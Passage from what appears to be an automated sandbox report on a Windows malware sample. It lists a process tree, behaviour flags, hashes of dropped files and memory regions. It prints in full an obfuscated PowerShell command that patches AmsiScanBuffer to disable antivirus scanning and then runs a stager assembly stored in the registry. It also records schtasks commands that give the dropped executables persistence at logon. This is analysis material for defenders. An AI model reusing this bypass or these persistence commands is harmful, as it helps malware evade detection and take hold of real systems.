IntPtr).GetType(),[string]),$Null);$aRjsesMhSNWUxRlQGEX=NscIYjMTeLUC @([String])([IntPtr]);$UAlEllQccqDSyEyirTnYCF=NscIYjMTeLUC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XOwVdZIvKLc=$YqosijnbkXWHS.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vaONYthrwtYHVu=$FGSIlmiIpqBvvy.Invoke($Null,@([Object]$XOwVdZIvKLc,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+'L'+'i'+[Char](98)+'r'+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$nUDdtIuczOtamWhye=$FGSIlmiIpqBvvy.Invoke($Null,@([Object]$XOwVdZIvKLc,[Object](''+'V'+''+'i'+'r'+'t'+''+'u'+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$oSKsLSG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vaONYthrwtYHVu,$aRjsesMhSNWUxRlQGEX).Invoke(''+'a'+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+[Char](108)+'l');$ojSrptxEUlacaYtQd=$FGSIlmiIpqBvvy.Invoke($Null,@([Object]$oSKsLSG,[Object]('Ams'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+'n'+'B'+'u'+'f'+'f'+'e'+'r'+'')));$GyrYGJzHKy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nUDdtIuczOtamWhye,$UAlEllQccqDSyEyirTnYCF).Invoke($ojSrptxEUlacaYtQd,[uint32]8,4,[ref]$GyrYGJzHKy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ojSrptxEUlacaYtQd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nUDdtIuczOtamWhye,$UAlEllQccqDSyEyirTnYCF).Invoke($ojSrptxEUlacaYtQd,[uint32]8,0x20,[ref]$GyrYGJzHKy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'AR'+[Char](69)+'').GetValue('$'+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qiuLgcvrqkzD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GzYBAVnaBMZkun,[Parameter(Position=1)][Type]$fgRTVyWXMd)$YwRUAZYMFUS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$YwRUAZYMFUS.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+'e'+'c'+''+'i'+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+'bl'+'i'+'c',[Reflection.CallingConventions]::Standard,$GzYBAVnaBMZkun).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+'ed');$YwRUAZYMFUS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+'g'+',Ne'+'w'+'Sl'+'o'+''+[Char](116)+','+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+'l',$fgRTVyWXMd,$GzYBAVnaBMZkun).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $YwRUAZYMFUS.CreateType();}$jiqEpFjGgIoEE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'e'+'m'+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+'i'+'c'+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'eN'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+'t'+'h'+'o'+'d'+'s'+'');$baiamGfryuTvux=$jiqEpFjGgIoEE.GetMethod(''+'G'+'et'+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eSeSvREAjabHATTMIQs=qiuLgcvrqkzD @([String])([IntPtr]);$mpetPrsDUEFqSvssEyYNUO=qiuLgcvrqkzD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZStOZcSWXao=$jiqEpFjGgIoEE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$NzQFEAHgvHPMrX=$baiamGfryuTvux.Invoke($Null,@([Object]$ZStOZcSWXao,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$RpPkkvPSOwdbICRzP=$baiamGfryuTvux.Invoke($Null,@([Object]$ZStOZcSWXao,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'ct')));$KrfNYHl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NzQFEAHgvHPMrX,$eSeSvREAjabHATTMIQs).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+'.'+''+[Char](100)+'ll');$qpZdMBJWHWFhnzoAW=$baiamGfryuTvux.Invoke($Null,@([Object]$KrfNYHl,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+'a'+'nBuf'+[Char](102)+''+[Char](101)+''+'r'+'')));$sXjDgGLPpU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RpPkkvPSOwdbICRzP,$mpetPrsDUEFqSvssEyYNUO).Invoke($qpZdMBJWHWFhnzoAW,[uint32]8,4,[ref]$sXjDgGLPpU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qpZdMBJWHWFhnzoAW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RpPkkvPSOwdbICRzP,$mpetPrsDUEFqSvssEyYNUO).Invoke($qpZdMBJWHWFhnzoAW,[uint32]8,0x20,[ref]$sXjDgGLPpU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'sta'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Sexy.exe"C:\Users\Admin\AppData\Local\Temp\Sexy.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Sexy.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$sxr-mtsha" /f4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63eIBINiSevA.bat" "4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BiosUpdX64YDPS.exe" /tr "'C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Sexy.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Sexy.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3668 -s 8682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3668 -s 9322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4612 -s 7122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4612 -s 6522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\63eIBINiSevA.batFilesize
271B
MD5fda7f447461abb6207e9b3be3d64faac
SHA1061ea146300a8ae5e960d08df6d5ed38d90519da
SHA256a1cf09200dbb548929b714cad891b3dfa9445a03d088abe22cbc5edadc24e1c4
SHA512682ef1b671990afe2dbcdc0193d1d5db32e6119e296cb918f0d90442059ba58f821927afa94fe9711d889a0295693084b1a0bc6fd9c49b0b64917f45649a71f8
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr\04-21-~1Filesize
224B
MD576cbb4d23eb7879a8904c865883463ad
SHA188c57576fb292bd9407eaf793a6436210b532b2d
SHA256eb2ce80614b48eb5cf19d760d5a1ad0ae142ec6536eb26c3566bec0f1ad6be5a
SHA512a3b9cfea9d1db58df358a1da19aa7fd079e20257adc36292b6185dc986d4e3eb013eda3e81d3129fd2e0d3976b39942010886d0a570de9dfd43f860a578c5b04
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exeFilesize
409KB
MD54c5faec89139e079202a5208d49ed5a0
SHA1f26bf551e191af0dd01b5d39ae0c8489d94a877e
SHA256bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
SHA5125d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
C:\Windows\Temp\__PSScriptPolicyTest_zuchhkww.iup.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5efe0903424c927d3611f8d8acd078b79
SHA122fda4e644f8fa0908493f40b930b1dff1755356
SHA25679fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA5128de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9
-
memory/216-52-0x00000277F0100000-0x00000277F012A000-memory.dmpFilesize
168KB
-
memory/216-43-0x00000277D79E0000-0x00000277D79F0000-memory.dmpFilesize
64KB
-
memory/216-65-0x00007FF88B790000-0x00007FF88C17C000-memory.dmpFilesize
9.9MB
-
memory/216-66-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/216-67-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/216-54-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/216-26-0x00000277D79E0000-0x00000277D79F0000-memory.dmpFilesize
64KB
-
memory/216-25-0x00007FF88B790000-0x00007FF88C17C000-memory.dmpFilesize
9.9MB
-
memory/216-27-0x00000277D79E0000-0x00000277D79F0000-memory.dmpFilesize
64KB
-
memory/216-28-0x00000277EFF90000-0x00000277EFFB2000-memory.dmpFilesize
136KB
-
memory/216-31-0x00000277F0140000-0x00000277F01B6000-memory.dmpFilesize
472KB
-
memory/216-53-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/364-127-0x000001D2413D0000-0x000001D2413FB000-memory.dmpFilesize
172KB
-
memory/368-125-0x000001884A090000-0x000001884A0BB000-memory.dmpFilesize
172KB
-
memory/428-50-0x0000000006750000-0x000000000675A000-memory.dmpFilesize
40KB
-
memory/428-84-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/428-88-0x00000000051F0000-0x0000000005200000-memory.dmpFilesize
64KB
-
memory/428-380-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/428-14-0x00000000051F0000-0x0000000005200000-memory.dmpFilesize
64KB
-
memory/428-13-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/588-75-0x00000211C4E10000-0x00000211C4E35000-memory.dmpFilesize
148KB
-
memory/588-78-0x00000211C4E40000-0x00000211C4E6B000-memory.dmpFilesize
172KB
-
memory/588-112-0x00007FF868400000-0x00007FF868410000-memory.dmpFilesize
64KB
-
memory/588-114-0x00007FF8A8415000-0x00007FF8A8416000-memory.dmpFilesize
4KB
-
memory/588-109-0x00000211C4E40000-0x00000211C4E6B000-memory.dmpFilesize
172KB
-
memory/588-76-0x00000211C4E40000-0x00000211C4E6B000-memory.dmpFilesize
172KB
-
memory/648-129-0x00007FF868400000-0x00007FF868410000-memory.dmpFilesize
64KB
-
memory/648-83-0x000001CEFF170000-0x000001CEFF19B000-memory.dmpFilesize
172KB
-
memory/648-122-0x000001CEFF170000-0x000001CEFF19B000-memory.dmpFilesize
172KB
-
memory/732-100-0x0000020FD4B70000-0x0000020FD4B9B000-memory.dmpFilesize
172KB
-
memory/1000-102-0x000002036C1D0000-0x000002036C1FB000-memory.dmpFilesize
172KB
-
memory/1000-165-0x00007FF8A8415000-0x00007FF8A8416000-memory.dmpFilesize
4KB
-
memory/1084-1655-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/1084-1654-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2304-836-0x0000000000F20000-0x0000000000F3C000-memory.dmpFilesize
112KB
-
memory/2400-366-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2400-460-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2440-983-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2440-1029-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2440-986-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/2960-1004-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2960-56-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2960-59-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2960-97-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2960-72-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2960-61-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2960-69-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/2960-71-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/2960-55-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2960-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3180-981-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/3180-969-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB
-
memory/3180-992-0x00007FF88B790000-0x00007FF88C17C000-memory.dmpFilesize
9.9MB
-
memory/3180-994-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmpFilesize
696KB
-
memory/3180-993-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/3180-856-0x00007FF88B790000-0x00007FF88C17C000-memory.dmpFilesize
9.9MB
-
memory/3180-857-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB
-
memory/3180-862-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB
-
memory/3180-985-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB
-
memory/3180-899-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/3180-978-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/3180-949-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB
-
memory/3180-968-0x00007FF88B790000-0x00007FF88C17C000-memory.dmpFilesize
9.9MB
-
memory/3272-575-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/3272-583-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmpFilesize
1.9MB
-
memory/3368-728-0x00007FF868400000-0x00007FF868410000-memory.dmpFilesize
64KB
-
memory/4228-2-0x0000000005580000-0x0000000005A7E000-memory.dmpFilesize
5.0MB
-
memory/4228-7-0x00000000061A0000-0x00000000061DE000-memory.dmpFilesize
248KB
-
memory/4228-4-0x00000000051B0000-0x00000000051C0000-memory.dmpFilesize
64KB
-
memory/4228-1-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/4228-3-0x00000000051C0000-0x0000000005252000-memory.dmpFilesize
584KB
-
memory/4228-0-0x0000000000880000-0x00000000008EC000-memory.dmpFilesize
432KB
-
memory/4228-5-0x0000000005260000-0x00000000052C6000-memory.dmpFilesize
408KB
-
memory/4228-20-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/4228-6-0x0000000005DB0000-0x0000000005DC2000-memory.dmpFilesize
72KB
-
memory/4992-877-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmpFilesize
64KB